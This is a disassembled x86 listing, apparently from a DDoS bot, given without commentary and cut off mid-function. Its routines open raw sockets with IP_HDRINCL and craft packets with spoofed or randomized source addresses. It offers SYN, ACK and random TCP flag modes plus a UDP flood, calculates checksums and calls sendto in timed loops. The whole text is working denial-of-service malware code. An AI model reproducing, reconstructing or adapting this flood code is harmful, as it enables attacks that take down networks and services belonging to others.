var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 98h
push ebx
push esi
push edi
and [ebp+var_88], 0
push 4
and [ebp+var_58], 0
pop esi
xor ecx, ecx
push 6
inc ecx
pop edx
mov ebx, 0FFh
xor eax, eax
lea edi, [ebp+var_54]
mov [ebp+var_84], ecx
mov [ebp+var_80], 2
mov [ebp+var_7C], esi
mov [ebp+var_78], edx
mov [ebp+var_74], 8
mov [ebp+var_70], 0Ch
mov [ebp+var_6C], 11h
mov [ebp+var_68], 16h
mov [ebp+var_64], 29h
mov [ebp+var_60], 3Ah
mov [ebp+var_5C], ebx
mov [ebp+var_50], eax
stosd
lea edi, [ebp+var_2C]
mov [ebp+var_4C], eax
mov [ebp+var_48], eax
mov [ebp+var_44], 2000h
mov [ebp+var_40], esi
mov [ebp+var_3C], edx
mov [ebp+var_38], 3FFFh
mov [ebp+var_34], ecx
mov [ebp+var_30], eax
mov [ebp+var_28], ecx
stosd
loc_414542: ; DATA XREF: _2:00454720�o
mov edi, 100h
push edi
call sub_420C30
pop ecx
mov [ebp+var_4], eax
push edi
push eax
call ds:dword_4E2FDC ; gethostname
push [ebp+var_4]
call ds:dword_4E304C ; gethostbyname
mov eax, [eax+0Ch]
push ebx
push 3
push 2
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_C], eax
call ds:dword_4E3048 ; socket
lea ecx, [ebp+var_28]
push esi
push ecx
push 2
push 0
push eax
mov [ebp+var_4], eax
call ds:dword_4E2FA8 ; setsockopt
mov esi, 200h
push esi
call sub_41BE40
mov edi, ds:dword_4F537C
pop ecx
mov [ebp+var_8], eax
call edi ; GetTickCount
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
push 29Ah
mov [ebp+var_94], eax
mov [ebp+var_98], 2
call ds:dword_4E2FC8 ; htons
mov [ebp+var_96], ax
jmp loc_414697
; ---------------------------------------------------------------------------
loc_4145CD: ; CODE XREF: sub_4144AD+1FB�j
call sub_41EB70
cdq
mov ecx, ebx
idiv ecx
mov eax, [ebp+var_C]
and eax, 0FFFFFFh
shl edx, 18h
or edx, eax
mov [ebp+var_C], edx
call sub_41EB70
cdq
mov ecx, ebx
idiv ecx
mov [ebp+var_54], edx
call sub_41EB70
cdq
mov ecx, 1FA4h
mov [ebp+var_24], 45h
idiv ecx
mov [ebp+var_23], 4
mov [ebp+var_2C], edx
call sub_41EB70
mov [ebp+var_20], ax
call sub_41EB70
push 0Ah
cdq
pop ecx
idiv ecx
mov ax, word ptr [ebp+edx*4+var_50]
push eax
call ds:dword_4E2FC8 ; htons
push esi
mov [ebp+var_1E], ax
call ds:dword_4E2FC8 ; htons
mov [ebp+var_22], ax
mov [ebp+var_1C], bl
call sub_41EB70
push 0Eh
cdq
pop ecx
idiv ecx
push 14h
mov al, byte ptr [ebp+edx*4+var_88]
mov [ebp+var_1B], al
mov eax, [ebp+var_C]
mov [ebp+var_18], eax
mov eax, [ebp+arg_0]
mov [ebp+var_14], eax
lea eax, [ebp+var_24]
push eax
call sub_40AF06
mov [ebp+var_1A], ax
lea eax, [ebp+var_24]
push 14h
push eax
push [ebp+var_8]
call sub_41FBF0
add esp, 14h
lea eax, [ebp+var_98]
push 10h
push eax
push 0
push esi
push [ebp+var_8]
push [ebp+var_4]
call ds:dword_4E302C ; sendto
loc_414697: ; CODE XREF: sub_4144AD+11B�j
call edi ; GetTickCount
sub eax, [ebp+var_10]
mov ecx, 3E8h
xor edx, edx
div ecx
cmp eax, [ebp+arg_4]
jbe loc_4145CD
push [ebp+var_8]
call sub_41C9D0
pop ecx
push [ebp+var_4]
call ds:dword_4E3060 ; closesocket
xor eax, eax
pop edi
pop esi
inc eax
pop ebx
leave
retn
sub_4144AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4146C8 proc near ; DATA XREF: sub_401C87+5468�o
var_440 = byte ptr -440h
var_240 = dword ptr -240h
var_23C = byte ptr -23Ch
var_1BC = byte ptr -1BCh
var_13C = byte ptr -13Ch
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A0 = byte ptr -0A0h
var_9F = byte ptr -9Fh
var_8C = byte ptr -8Ch
var_80 = byte ptr -80h
var_78 = byte ptr -78h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = word ptr -5Ah
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 440h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+var_240]
rep movsd
xor esi, esi
push 0Eh
inc esi
xor ebx, ebx
mov [eax+19Ch], esi
pop ecx
xor eax, eax
lea edi, [ebp+var_9F]
mov [ebp+var_A0], bl
rep stosd
stosw
stosb
mov edi, ds:dword_4F537C
call edi ; GetTickCount
push eax
call sub_41EB60
pop ecx
push 0FFh
push 3
push 2
call ds:dword_4E3048 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_414791
call ds:dword_4E2F5C ; WSAGetLastError
push eax
lea eax, [ebp+var_440]
push offset unk_44CDC0
push eax
call sub_41EA60
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_414771
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_409C75
add esp, 14h
loc_414771: ; CODE XREF: sub_4146C8+84�j
lea eax, [ebp+var_440]
push eax
call sub_415A3C
push [ebp+var_BC]
call sub_40B9A7
pop ecx
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_414791: ; CODE XREF: sub_4146C8+61�j
lea ecx, [ebp+var_34]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_34], esi
call ds:dword_4E2FA8 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_41480F
call ds:dword_4E2F5C ; WSAGetLastError
push eax
lea eax, [ebp+var_440]
push offset unk_44CDF4
push eax
call sub_41EA60
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_4147EF
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_409C75
add esp, 14h
loc_4147EF: ; CODE XREF: sub_4146C8+102�j
lea eax, [ebp+var_440]
push eax
call sub_415A3C
push [ebp+var_BC]
call sub_40B9A7
pop ecx
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_41480F: ; CODE XREF: sub_4146C8+DF�j
lea eax, [ebp+var_23C]
push eax
call ds:dword_4E3008 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_41487F
lea eax, [ebp+var_440]
push offset unk_44CE2C
push eax
call sub_41EA60
cmp [ebp+var_A8], ebx
pop ecx
pop ecx
jnz short loc_41485F
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_409C75
add esp, 14h
loc_41485F: ; CODE XREF: sub_4146C8+172�j
lea eax, [ebp+var_440]
push eax
call sub_415A3C
push [ebp+var_BC]
call sub_40B9A7
pop ecx
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_41487F: ; CODE XREF: sub_4146C8+157�j
push 10h
lea eax, [ebp+var_44]
push ebx
push eax
call sub_41E4B0
add esp, 0Ch
mov [ebp+var_44], 2
push ebx
call ds:dword_4E2FC8 ; htons
mov [ebp+var_42], ax
lea eax, [ebp+var_23C]
push eax
call ds:dword_4E3008 ; inet_addr
mov [ebp+var_40], eax
mov [ebp+arg_0], ebx
call edi ; GetTickCount
mov [ebp+var_30], eax
jmp loc_414AE7
; ---------------------------------------------------------------------------
loc_4148BC: ; CODE XREF: sub_4146C8+433�j
push 28h
mov [ebp+var_2C], 45h
call ds:dword_4E2FC8 ; htons
cmp [ebp+var_B0], ebx
mov [ebp+var_2A], ax
mov [ebp+var_28], si
mov [ebp+var_26], bx
mov [ebp+var_24], 80h
mov [ebp+var_23], 6
mov [ebp+var_22], bx
jz short loc_414915
call sub_41EB70
mov esi, eax
shl esi, 8
call sub_41EB70
add esi, eax
shl esi, 8
call sub_41EB70
add esi, eax
shl esi, 8
call sub_41EB70
add esi, eax
mov [ebp+var_20], esi
xor esi, esi
inc esi
jmp short loc_41492B
; ---------------------------------------------------------------------------
loc_414915: ; CODE XREF: sub_4146C8+21E�j
push [ebp+var_240]
call sub_40AEAD
pop ecx
push eax
call ds:dword_4E3008 ; inet_addr
mov [ebp+var_20], eax
loc_41492B: ; CODE XREF: sub_4146C8+24B�j
mov eax, [ebp+var_40]
cmp [ebp+var_B8], ebx
mov [ebp+var_1C], eax
jnz short loc_414949
call sub_41EB70
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_41494F
; ---------------------------------------------------------------------------
loc_414949: ; CODE XREF: sub_4146C8+26F�j
push [ebp+var_B8]
loc_41494F: ; CODE XREF: sub_4146C8+27F�j
call ds:dword_4E2FC8 ; htons
mov [ebp+var_16], ax
call sub_41EB70
cdq
mov ecx, 401h
idiv ecx
push edx
call ds:dword_4E2FC8 ; htons
push 12345678h
mov [ebp+var_18], ax
call ds:dword_4E2FC4 ; htonl
mov [ebp+var_14], eax
lea eax, [ebp+var_1BC]
push offset aSyn_1 ; "syn"
push eax
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jz short loc_41499F
mov [ebp+var_10], ebx
mov [ebp+var_B], 2
jmp short loc_4149FB
; ---------------------------------------------------------------------------
loc_41499F: ; CODE XREF: sub_4146C8+2CC�j
lea eax, [ebp+var_1BC]
push offset aAck_0 ; "ack"
push eax
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jz short loc_4149BF
mov [ebp+var_10], ebx
mov [ebp+var_B], 10h
jmp short loc_4149FB
; ---------------------------------------------------------------------------
loc_4149BF: ; CODE XREF: sub_4146C8+2EC�j
lea eax, [ebp+var_1BC]
push offset aRandom_2 ; "random"
push eax
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jz short loc_4149FB
call sub_41EB70
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_10], edx
call sub_41EB70
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_B], dl
loc_4149FB: ; CODE XREF: sub_4146C8+2D5�j
; sub_4146C8+2F5�j ...
push 200h
mov [ebp+var_C], 50h
call ds:dword_4E2FC8 ; htons
mov [ebp+var_A], ax
mov eax, [ebp+var_20]
mov [ebp+var_64], eax
mov eax, [ebp+var_1C]
push 14h
mov [ebp+var_6], bx
mov [ebp+var_8], bx
mov [ebp+var_60], eax
mov [ebp+var_5C], bl
mov [ebp+var_5B], 6
call ds:dword_4E2FC8 ; htons
mov [ebp+var_5A], ax
lea eax, [ebp+var_64]
push 20h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_41FBF0
lea eax, [ebp+var_18]
push 14h
push eax
lea eax, [ebp+var_80]
push eax
call sub_41FBF0
lea eax, [ebp+var_A0]
push 34h
push eax
call sub_40AF06
mov [ebp+var_8], ax
lea eax, [ebp+var_2C]
push 14h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_41FBF0
lea eax, [ebp+var_18]
push 14h
push eax
lea eax, [ebp+var_8C]
push eax
call sub_41FBF0
push 4
lea eax, [ebp+var_78]
push ebx
push eax
call sub_41E4B0
add esp, 44h
lea eax, [ebp+var_A0]
push 28h
push eax
call sub_40AF06
mov [ebp+var_22], ax
lea eax, [ebp+var_2C]
push 14h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_41FBF0
add esp, 14h
lea eax, [ebp+var_44]
push 10h
push eax
push ebx
lea eax, [ebp+var_A0]
push 3Ch
push eax
push [ebp+var_4]
call ds:dword_4E302C ; sendto
cmp eax, 0FFFFFFFFh
jz loc_414B92
inc [ebp+arg_0]
loc_414AE7: ; CODE XREF: sub_4146C8+1EF�j
call edi ; GetTickCount
sub eax, [ebp+var_30]
mov ecx, 3E8h
xor edx, edx
div ecx
cmp eax, [ebp+var_B4]
jbe loc_4148BC
push [ebp+var_4]
call ds:dword_4E3060 ; closesocket
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_B4]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_23C]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_1BC]
push eax
lea eax, [ebp+var_440]
push offset unk_44CE60
push eax
call sub_41EA60
add esp, 1Ch
cmp [ebp+var_A8], ebx
jnz short loc_414B72
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_409C75
add esp, 14h
loc_414B72: ; CODE XREF: sub_4146C8+485�j
lea eax, [ebp+var_440]
push eax
call sub_415A3C
push [ebp+var_BC]
call sub_40B9A7
pop ecx
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_414B92: ; CODE XREF: sub_4146C8+416�j
push [ebp+var_4]
call ds:dword_4E3060 ; closesocket
call ds:dword_4E2F5C ; WSAGetLastError
push eax
lea eax, [ebp+var_23C]
push [ebp+arg_0]
push eax
push offset unk_44CEB0
lea eax, [ebp+var_440]
push 200h
push eax
call sub_41EC30
add esp, 18h
cmp [ebp+var_A8], ebx
jnz short loc_414BF0
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_409C75
add esp, 14h
loc_414BF0: ; CODE XREF: sub_4146C8+503�j
lea eax, [ebp+var_440]
push eax
call sub_415A3C
push [ebp+var_BC]
call sub_40B9A7
pop ecx
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
sub_4146C8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414C10 proc near ; CODE XREF: sub_414D19+196�p
; sub_414D19+1FF�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
mov edx, [ebp+arg_0]
push esi
xor esi, esi
cmp ecx, 1
mov [ebp+arg_4], esi
jle short loc_414C3E
lea eax, [ecx-2]
push edi
shr eax, 1
inc eax
lea edi, [eax+eax]
sub ecx, edi
loc_414C30: ; CODE XREF: sub_414C10+28�j
movzx edi, word ptr [edx]
add esi, edi
inc edx
inc edx
dec eax
jnz short loc_414C30
pop edi
cmp ecx, 1
loc_414C3E: ; CODE XREF: sub_414C10+12�j
jnz short loc_414C4B
mov al, [edx]
mov byte ptr [ebp+arg_4], al
movzx eax, word ptr [ebp+arg_4]
add esi, eax
loc_414C4B: ; CODE XREF: sub_414C10:loc_414C3E�j
mov ecx, esi
and esi, 0FFFFh
sar ecx, 10h
add ecx, esi
pop esi
mov eax, ecx
sar eax, 10h
add eax, ecx
not eax
pop ebp
retn
sub_414C10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414C64 proc near ; DATA XREF: sub_401C87+6D8C�o
var_394 = byte ptr -394h
var_194 = dword ptr -194h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 394h
mov eax, [ebp+arg_0]
push esi
push edi
push 65h
pop ecx
mov esi, eax
lea edi, [ebp+var_194]
rep movsd
mov dword ptr [eax+190h], 1
lea eax, [ebp+var_110]
push eax
call sub_41E710
pop ecx
push eax
lea eax, [ebp+var_190]
push eax
call ds:dword_4E3008 ; inet_addr
push eax
lea esi, [ebp+var_194]
sub esp, 194h
push 65h
pop ecx
mov edi, esp
rep movsd
call sub_414D19
push eax
lea eax, [ebp+var_394]
push offset unk_44CF00
push eax
call sub_41EA60
xor esi, esi
add esp, 1A8h
cmp [ebp+var_8], esi
jnz short loc_414CFC
push esi
lea eax, [ebp+var_394]
push [ebp+var_C]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_194]
call sub_409C75
add esp, 14h
loc_414CFC: ; CODE XREF: sub_414C64+76�j
lea eax, [ebp+var_394]
push eax
call sub_415A3C
push [ebp+var_10]
call sub_40B9A7
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
sub_414C64 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414D19 proc near ; CODE XREF: sub_414C64+54�p
var_C8 = byte ptr -0C8h
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = byte ptr -0A0h
var_9F = byte ptr -9Fh
var_9E = word ptr -9Eh
var_9C = byte ptr -9Ch
var_88 = byte ptr -88h
var_74 = word ptr -74h
var_72 = word ptr -72h
var_70 = dword ptr -70h
var_64 = byte ptr -64h
var_60 = byte ptr -60h
var_5F = byte ptr -5Fh
var_5E = byte ptr -5Eh
var_54 = dword ptr -54h
var_50 = byte ptr -50h
var_4E = word ptr -4Eh
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = byte ptr -48h
var_47 = byte ptr -47h
var_46 = word ptr -46h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = word ptr -3Ch
var_3A = word ptr -3Ah
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_24 = byte ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_194 = dword ptr 19Ch
arg_198 = dword ptr 1A0h
push ebp
mov ebp, esp
sub esp, 0C8h
and [ebp+var_4], 0
push ebx
push esi
mov esi, ds:dword_4F537C
push edi
call esi ; GetTickCount
push 0FFh
push 3
push 2
mov [ebp+var_C], eax
call ds:dword_4E3048 ; socket
mov [ebp+var_8], eax
call esi ; GetTickCount
push eax
call sub_41EB60
pop ecx
mov ebx, 578h
push ebx
push 9
push 1
call sub_419313
pop ecx
pop ecx
push eax
lea eax, [ebp+var_24]
push eax
call sub_41E4B0
add esp, 0Ch
mov esi, 5A0h
loc_414D72: ; CODE XREF: sub_414D19+224�j
call ds:dword_4F537C ; GetTickCount
sub eax, [ebp+var_C]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_198]
ja loc_414F42
cmp ds:dword_4E676C, 0
jnz short loc_414DF1
push 10h
pop eax
mov [ebp+var_10], eax
push eax
lea eax, [ebp+var_64]
push 0
push eax
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_64]
push eax
push [ebp+arg_0]
call ds:dword_4E2F6C ; getsockname
push 0FFh
push 1
call sub_419313
push eax
movzx eax, [ebp+var_5E]
push eax
movzx eax, [ebp+var_5F]
push eax
movzx eax, [ebp+var_60]
push eax
lea eax, [ebp+var_C8]
push offset aD_D_D_D_1 ; "%d.%d.%d.%d"
push eax
call sub_41EA60
add esp, 20h
jmp short loc_414E04
; ---------------------------------------------------------------------------
loc_414DF1: ; CODE XREF: sub_414D19+7E�j
lea eax, [ebp+var_C8]
push offset dword_4E6150
push eax
call sub_41F620
pop ecx
pop ecx
loc_414E04: ; CODE XREF: sub_414D19+D6�j
lea eax, [ebp+var_C8]
push eax
call ds:dword_4E3008 ; inet_addr
mov edi, eax
mov eax, [ebp+var_54]
and al, 45h
push esi
or al, 45h
mov [ebp+var_50], 10h
mov [ebp+var_54], eax
call ds:dword_4E2FC8 ; htons
mov [ebp+var_4E], ax
call sub_41EB70
and [ebp+var_46], 0
mov [ebp+var_4C], ax
mov eax, [ebp+arg_194]
loc_414E40: ; DATA XREF: _2:0045474C�o
mov [ebp+var_4A], 40h
mov [ebp+var_48], 40h
mov [ebp+var_47], 6
mov [ebp+var_44], edi
mov [ebp+var_40], eax
call sub_41EB70
mov [ebp+var_3C], ax
call sub_41EB70
mov [ebp+var_3A], ax
call sub_41EB70
mov [ebp+var_38], eax
call sub_41EB70
mov [ebp+var_34], eax
mov eax, [ebp+var_30]
and al, 50h
mov edi, [ebp+var_40]
or al, 50h
and [ebp+var_2A], 0
and [ebp+var_28], 0
mov word ptr [ebp+var_30], ax
mov ax, [ebp+var_3A]
push 14h
mov [ebp+var_72], ax
lea eax, [ebp+var_54]
push eax
mov byte ptr [ebp+var_30+2], 18h
mov [ebp+var_2C], 787Dh
mov [ebp+var_74], 2
mov [ebp+var_70], edi
call sub_414C10
and [ebp+var_A0], 0
pop ecx
pop ecx
mov [ebp+var_46], ax
mov eax, [ebp+var_44]
push 58Ch
mov [ebp+var_A8], eax
mov [ebp+var_A4], edi
mov [ebp+var_9F], 6
call ds:dword_4F552C ; htons
mov [ebp+var_9E], ax
lea eax, [ebp+var_9C]
push 14h
push eax
lea eax, [ebp+var_3C]
push eax
call sub_41FBF0
lea eax, [ebp+var_88]
push ebx
push eax
lea eax, [ebp+var_24]
push eax
call sub_41FBF0
lea eax, [ebp+var_A8]
push 598h
push eax
call sub_414C10
add esp, 20h
mov [ebp+var_2A], ax
lea eax, [ebp+var_74]
push 10h
push eax
push 0
push esi
lea eax, [ebp+var_54]
push eax
push [ebp+var_8]
call ds:dword_4E302C ; sendto
inc [ebp+var_4]
jmp loc_414D72
; ---------------------------------------------------------------------------
loc_414F42: ; CODE XREF: sub_414D19+71�j
push [ebp+var_8]
call ds:dword_4E3060 ; closesocket
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_414D19 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414F53 proc near ; DATA XREF: sub_401C87+4D47�o
var_414 = byte ptr -414h
var_214 = byte ptr -214h
var_10 = dword ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov edx, [ebp+arg_0]
push esi
mov eax, 85h
push edi
mov ecx, eax
mov esi, edx
lea edi, [ebp+var_214]
sub esp, 214h
rep movsd
mov ecx, eax
lea esi, [ebp+var_214]
mov edi, esp
mov dword ptr [edx+210h], 1
rep movsd
call sub_414FC9
push eax
lea eax, [ebp+var_414]
push offset unk_44CF40
push eax
call sub_41EA60
add esp, 220h
lea eax, [ebp+var_414]
push eax
call sub_415A3C
push [ebp+var_10]
call sub_40B9A7
pop ecx
pop ecx
push 0
call ds:dword_4F53A0 ; ExitThread
sub_414F53 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414FC9 proc near ; CODE XREF: sub_414F53+3B�p
var_254 = byte ptr -254h
var_54 = byte ptr -54h
var_34 = byte ptr -34h
var_30 = byte ptr -30h
var_2F = byte ptr -2Fh
var_2E = byte ptr -2Eh
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_84 = byte ptr 8Ch
arg_104 = byte ptr 10Ch
arg_184 = byte ptr 18Ch
arg_208 = dword ptr 210h
arg_20C = dword ptr 214h
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
mov ebx, 0FFh
push edi
push ebx
push 3
push 2
call ds:dword_4E3048 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jnz short loc_415007
lea eax, [ebp+var_254]
push offset unk_44CF80
push eax
call sub_41EA60
pop ecx
xor edi, edi
pop ecx
jmp loc_4152CD
; ---------------------------------------------------------------------------
loc_415007: ; CODE XREF: sub_414FC9+22�j
lea ecx, [ebp+var_14]
push 4
push ecx
xor edi, edi
push 2
push edi
push eax
mov [ebp+var_14], 1
call ds:dword_4E2FA8 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_415033
call ds:dword_4E2F5C ; WSAGetLastError
push eax
push offset unk_44CFB0
jmp short loc_41504E
; ---------------------------------------------------------------------------
loc_415033: ; CODE XREF: sub_414FC9+5A�j
lea eax, [ebp+arg_4]
push eax
call ds:dword_4E3008 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_415062
call ds:dword_4E2F5C ; WSAGetLastError
push eax
push offset unk_44D000
loc_41504E: ; CODE XREF: sub_414FC9+68�j
lea eax, [ebp+var_254]
push eax
call sub_41EA60
add esp, 0Ch
jmp loc_4152CD
; ---------------------------------------------------------------------------
loc_415062: ; CODE XREF: sub_414FC9+77�j
push edi
mov [ebp+var_24], 2
call ds:dword_4E2FC8 ; htons
mov [ebp+var_22], ax
lea eax, [ebp+arg_4]
push eax
call ds:dword_4F5528 ; inet_addr
mov esi, ds:dword_4F537C
mov [ebp+var_20], eax
call esi ; GetTickCount
mov [ebp+var_8], eax
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_254]
push offset unk_44D044
push eax
call sub_41EA60
add esp, 0Ch
cmp [ebp+arg_20C], edi
jnz short loc_4150CB
push edi
lea eax, [ebp+var_254]
push [ebp+arg_208]
push eax
lea eax, [ebp+arg_184]
push eax
push [ebp+arg_0]
call sub_409C75
add esp, 14h
loc_4150CB: ; CODE XREF: sub_414FC9+E0�j
mov [ebp+var_4], edi
call esi ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
mov esi, eax
lea eax, [ebp+arg_104]
push eax
call sub_41E710
cmp esi, eax
pop ecx
ja loc_415284
mov esi, 41Ch
jmp short loc_4150FF
; ---------------------------------------------------------------------------
loc_4150FA: ; CODE XREF: sub_414FC9+2B5�j
mov ebx, 0FFh
loc_4150FF: ; CODE XREF: sub_414FC9+12F�j
cmp ds:dword_4E676C, edi
jnz short loc_415157
push 10h
pop eax
mov [ebp+var_10], eax
push eax
lea eax, [ebp+var_34]
push edi
push eax
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_34]
push eax
push [ebp+arg_0]
call ds:dword_4E2F6C ; getsockname
push ebx
push 1
call sub_419313
push eax
movzx eax, [ebp+var_2E]
push eax
movzx eax, [ebp+var_2F]
push eax
movzx eax, [ebp+var_30]
push eax
lea eax, [ebp+var_54]
push offset aD_D_D_D_2 ; "%d.%d.%d.%d"
push eax
call sub_41EA60
add esp, 20h
jmp short loc_415167
; ---------------------------------------------------------------------------
loc_415157: ; CODE XREF: sub_414FC9+13C�j
lea eax, [ebp+var_54]
push offset dword_4E6150
push eax
call sub_41F620
pop ecx
pop ecx
loc_415167: ; CODE XREF: sub_414FC9+18C�j
push esi
mov ds:byte_4E6350, 45h
call ds:dword_4E2FC8 ; htons
mov ds:word_4E6352, ax
lea eax, [ebp+var_54]
push eax
mov ds:word_4E6354, 1
mov ds:word_4E6356, di
mov ds:byte_4E6358, 80h
mov ds:byte_4E6359, 11h
mov ds:word_4E635A, di
call ds:dword_4E3008 ; inet_addr
mov ds:dword_4E635C, eax
mov eax, [ebp+var_20]
mov ds:dword_4E6360, eax
lea eax, [ebp+arg_84]
push eax
mov ds:word_4E636A, di
call sub_41E710
test eax, eax
pop ecx
jnz short loc_4151DF
call sub_41EB70
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_4151ED
; ---------------------------------------------------------------------------
loc_4151DF: ; CODE XREF: sub_414FC9+204�j
lea eax, [ebp+arg_84]
push eax
call sub_41E710
pop ecx
push eax
loc_4151ED: ; CODE XREF: sub_414FC9+214�j
call ds:dword_4E2FC8 ; htons
mov ds:word_4E6366, ax
call sub_41EB70
cdq
mov ecx, 401h
push 408h
idiv ecx
mov ds:word_4E6364, dx
call ds:dword_4E2FC8 ; htons
push 400h
mov ds:word_4E6368, ax
call sub_41EB70
cdq
idiv ebx
push edx
push offset dword_4E636C
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+var_24]
push 10h
push eax
push edi
push esi
push offset byte_4E6350
loc_415246: ; DATA XREF: _2:00454618�o _2:00454620�o
push [ebp+var_C]
call ds:dword_4E302C ; sendto
cmp eax, 0FFFFFFFFh
jz loc_4152FC
inc [ebp+var_4]
call ds:dword_4F537C ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, eax
lea eax, [ebp+arg_104]
push eax
call sub_41E710
cmp ebx, eax
pop ecx
jbe loc_4150FA
loc_415284: ; CODE XREF: sub_414FC9+124�j
push [ebp+var_C]
call ds:dword_4E3060 ; closesocket
mov esi, [ebp+var_4]
lea eax, [ebp+arg_104]
push eax
imul esi, 41Ch
call sub_41E710
mov ecx, eax
mov eax, esi
shr eax, 0Ah
xor edx, edx
div ecx
shr esi, 14h
push eax
push esi
